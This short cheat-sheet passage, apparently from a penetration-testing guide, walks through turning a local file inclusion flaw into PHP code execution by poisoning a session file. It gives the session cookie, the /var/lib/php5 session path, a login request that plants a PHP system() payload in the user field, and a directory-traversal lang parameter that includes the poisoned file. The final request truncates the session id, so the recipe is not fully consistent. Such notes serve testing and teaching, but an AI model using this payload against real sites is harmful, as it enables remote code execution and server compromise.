#Check if the website use PHP
SESSIDSet-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Tue, 30-Jun-2020 10:25:29 GMT; path=/; httponly
#In php sessions are store into /var/lib/php5/sess_PHPSESSID files
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
#Set the cookie to <?php system("whoami"); ?>
login=1&user=<?php system("whoami");?>&pass=password&lang=en_us.php
#Use the LFI to include the PHP session file
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2